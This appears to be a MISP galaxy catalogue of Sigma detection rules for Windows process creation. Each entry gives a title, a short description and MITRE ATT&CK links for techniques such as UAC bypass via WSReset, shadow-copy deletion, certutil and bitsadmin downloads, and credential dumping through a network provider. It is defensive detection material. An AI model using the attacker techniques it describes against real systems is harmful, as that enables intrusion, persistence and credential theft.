https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml

HackTool - SharPersist Execution

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

The tag is: misp-galaxy:sigma-rules="HackTool - SharPersist Execution"

HackTool - SharPersist Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 10246. Table References

Links

https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit

https://github.com/mandiant/SharPersist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml

Suspicious File Characteristics Due to Missing Fields

Detects executables in the Downloads folder without the FileVersion, Description, Product and Company fields, which were likely created with py2exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Characteristics Due to Missing Fields"

Suspicious File Characteristics Due to Missing Fields has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 10247. Table References

Links

https://www.virustotal.com//file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection

https://securelist.com/muddywater/88059/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml

Cscript/Wscript Uncommon Script Extension Execution

Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

The tag is: misp-galaxy:sigma-rules="Cscript/Wscript Uncommon Script Extension Execution"

Cscript/Wscript Uncommon Script Extension Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10248. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml

PUA - 3Proxy Execution

Detects the use of 3proxy, a tiny free proxy server

The tag is: misp-galaxy:sigma-rules="PUA - 3Proxy Execution"

PUA - 3Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10249. Table References

Links

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/3proxy/3proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml

Bypass UAC via WSReset.exe

Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

The tag is: misp-galaxy:sigma-rules="Bypass UAC via WSReset.exe"

Bypass UAC via WSReset.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10250. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html

https://www.activecyber.us/activelabs/windows-uac-bypass

https://twitter.com/ReaQta/status/1222548288731217921

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml

Python Inline Command Execution

Detects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live Python code.

The tag is: misp-galaxy:sigma-rules="Python Inline Command Execution"

Python Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10251. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://docs.python.org/3/using/cmdline.html#cmdoption-c

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml

Schtasks Creation Or Modification With SYSTEM Privileges

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

The tag is: misp-galaxy:sigma-rules="Schtasks Creation Or Modification With SYSTEM Privileges"

Schtasks Creation Or Modification With SYSTEM Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10252. Table References

Links

https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml

Suspicious Greedy Compression Using Rar.EXE

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

The tag is: misp-galaxy:sigma-rules="Suspicious Greedy Compression Using Rar.EXE"

Suspicious Greedy Compression Using Rar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10253. Table References

Links

https://decoded.avast.io/martinchlumecky/png-steganography

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml

HackTool - CrackMapExec Execution Patterns

Detects various execution patterns of the CrackMapExec pentesting framework

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Execution Patterns"

HackTool - CrackMapExec Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10254. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml

Whoami.EXE Execution From Privileged Process

Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution From Privileged Process"

Whoami.EXE Execution From Privileged Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10255. Table References

Links

https://nsudo.m2team.org/en-us/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml

Nltest.EXE Execution

Detects nltest commands that can be used for information discovery

The tag is: misp-galaxy:sigma-rules="Nltest.EXE Execution"

Nltest.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10256. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_execution.yml

Remote Access Tool - Simple Help Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - Simple Help Execution"

Remote Access Tool - Simple Help Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10257. Table References

Links

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml

Shadow Copies Deletion Using Operating Systems Utilities

Detects Shadow Copies deletion using operating system utilities

The tag is: misp-galaxy:sigma-rules="Shadow Copies Deletion Using Operating Systems Utilities"

Shadow Copies Deletion Using Operating Systems Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10258. Table References

Links

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

https://github.com/Neo23x0/Raccine#the-process

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/

https://redcanary.com/blog/intelligence-insights-october-2021/

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/

https://blog.talosintelligence.com/2017/05/wannacry.html

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml

Fsutil Drive Enumeration

Attackers may leverage fsutil to enumerate connected drives.

The tag is: misp-galaxy:sigma-rules="Fsutil Drive Enumeration"

Fsutil Drive Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 10259. Table References

Links

Turla has used fsutil fsinfo drives to list connected drives.

https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml

Lolbin Ssh.exe Use As Proxy

Detect usage of the "ssh.exe" binary as a proxy to launch other programs

The tag is: misp-galaxy:sigma-rules="Lolbin Ssh.exe Use As Proxy"

Lolbin Ssh.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10260. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ssh/

https://gtfobins.github.io/gtfobins/ssh/

https://man.openbsd.org/ssh_config#LocalCommand

https://github.com/LOLBAS-Project/LOLBAS/pull/211/files

https://man.openbsd.org/ssh_config#ProxyCommand

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml

Potential Suspicious Activity Using SeCEdit

Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Activity Using SeCEdit"

Potential Suspicious Activity Using SeCEdit has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Terminal Services DLL - T1505.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10261. Table References

Links

https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_secedit_execution.yml

Wab Execution From Non Default Location

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations, as seen with Bumblebee activity.

The tag is: misp-galaxy:sigma-rules="Wab Execution From Non Default Location"

Table 10262. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

The tag is: misp-galaxy:sigma-rules="File Download Via Bitsadmin"

File Download Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10263. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml

Potentially Suspicious Office Document Executed From Trusted Location

Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Office Document Executed From Trusted Location"

Potentially Suspicious Office Document Executed From Trusted Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10264. Table References

Links

https://twitter.com/Max_Mal_/status/1633863678909874176

https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465

https://twitter.com/_JohnHammond/status/1588155401752788994

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Registry File Imported Via Reg.EXE"

Potential Suspicious Registry File Imported Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10265. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml

Use of VSIISExeLauncher.exe

The "VSIISExeLauncher.exe" binary, part of Visual Studio/VS Code, can be used to execute arbitrary binaries.

The tag is: misp-galaxy:sigma-rules="Use of VSIISExeLauncher.exe"

Use of VSIISExeLauncher.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10266. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml

Regedit as Trusted Installer

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

The tag is: misp-galaxy:sigma-rules="Regedit as Trusted Installer"

Regedit as Trusted Installer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 10267. Table References

Links

https://twitter.com/1kwpeter/status/1397816101455765504

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml

Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

The tag is: misp-galaxy:sigma-rules="Bad Opsec Defaults Sacrificial Processes With Improper Arguments"

Bad Opsec Defaults Sacrificial Processes With Improper Arguments has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10268. Table References

Links

https://twitter.com/CyberRaiju/status/1251492025678983169

https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32

https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/

https://www.cobaltstrike.com/help-opsec

https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml

Suspicious File Downloaded From Direct IP Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.

The tag is: misp-galaxy:sigma-rules="Suspicious File Downloaded From Direct IP Via Certutil.EXE"

Suspicious File Downloaded From Direct IP Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10269. Table References

Links

https://twitter.com/_JohnHammond/status/1708910264261980634

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://twitter.com/egre55/status/1087685529016193025

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml

Potential RDP Tunneling Via SSH

Execution of ssh.exe to perform data exfiltration and tunneling through RDP

The tag is: misp-galaxy:sigma-rules="Potential RDP Tunneling Via SSH"

Potential RDP Tunneling Via SSH has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10270. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml

Arbitrary File Download Via IMEWDBLD.EXE

Detects usage of "IMEWDBLD.exe" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via IMEWDBLD.EXE"

Arbitrary File Download Via IMEWDBLD.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10271. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imewbdld_download.yml

REGISTER_APP.VBS Proxy Execution

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

The tag is: misp-galaxy:sigma-rules="REGISTER_APP.VBS Proxy Execution"

REGISTER_APP.VBS Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10272. Table References

Links

https://twitter.com/sblmsrsn/status/1456613494783160325?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml

Suspicious Service Binary Directory

Detects a service binary running in a suspicious directory

The tag is: misp-galaxy:sigma-rules="Suspicious Service Binary Directory"

Suspicious Service Binary Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10273. Table References

Links

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml

Modify Group Policy Settings

Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.

The tag is: misp-galaxy:sigma-rules="Modify Group Policy Settings"

Modify Group Policy Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

Table 10274. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml

Renamed Vmnat.exe Execution

Detects a renamed vmnat.exe or a portable version of it that can be used for DLL side-loading.

The tag is: misp-galaxy:sigma-rules="Renamed Vmnat.exe Execution"

Renamed Vmnat.exe Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10275. Table References

Links

https://twitter.com/malmoeb/status/1525901219247845376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml

HackTool - LocalPotato Execution

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

The tag is: misp-galaxy:sigma-rules="HackTool - LocalPotato Execution"

Table 10276. Table References

Links

https://github.com/decoder-it/LocalPotato

https://www.localpotato.com/localpotato_html/LocalPotato.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml

HackTool - Impersonate Execution

Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively.

The tag is: misp-galaxy:sigma-rules="HackTool - Impersonate Execution"

HackTool - Impersonate Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"

Table 10277. Table References

Links

https://github.com/sensepost/impersonate

https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml

Arbitrary File Download Via PresentationHost.EXE

Detects usage of "PresentationHost", a utility that runs ".xbap" (Browser Application) files, to download arbitrary files.

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via PresentationHost.EXE"

Arbitrary File Download Via PresentationHost.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10278. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/239/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_download.yml

Suspicious Processes Spawned by Java.EXE

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

The tag is: misp-galaxy:sigma-rules="Suspicious Processes Spawned by Java.EXE"

Table 10279. Table References

Links

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml

Potential Credential Dumping Attempt Using New NetworkProvider - CLI

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Using New NetworkProvider - CLI"

Potential Credential Dumping Attempt Using New NetworkProvider - CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10280. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml

Use of Pcalua For Execution

Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

The tag is: misp-galaxy:sigma-rules="Use of Pcalua For Execution"

Use of Pcalua For Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10281. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcalua/

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml

Install New Package Via Winget Local Manifest

Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.

The tag is: misp-galaxy:sigma-rules="Install New Package Via Winget Local Manifest"

Install New Package Via Winget Local Manifest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10282. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Winget/

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml

Non-privileged Usage of Reg or Powershell

Detects usage of reg or PowerShell by non-privileged users to modify service configuration in the registry.

The tag is: misp-galaxy:sigma-rules="Non-privileged Usage of Reg or Powershell"

Non-privileged Usage of Reg or Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10283. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml

Usage Of Web Request Commands And Cmdlets

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine

The tag is: misp-galaxy:sigma-rules="Usage Of Web Request Commands And Cmdlets"

Usage Of Web Request Commands And Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10284. Table References

Links

https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps

https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml

Using SettingSyncHost.exe as LOLBin

Detects the use of SettingSyncHost.exe to run a hijacked binary.

The tag is: misp-galaxy:sigma-rules="Using SettingSyncHost.exe as LOLBin"

Using SettingSyncHost.exe as LOLBin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"

Table 10285. Table References

Links

https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml

Suspicious Process Parents

Detects suspicious parent processes that should not have any children or should only have a single possible child program

The tag is: misp-galaxy:sigma-rules="Suspicious Process Parents"

Suspicious Process Parents has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10286. Table References

Links

https://twitter.com/x86matthew/status/1505476263464607744?s=12

https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml

Powershell Defender Exclusion

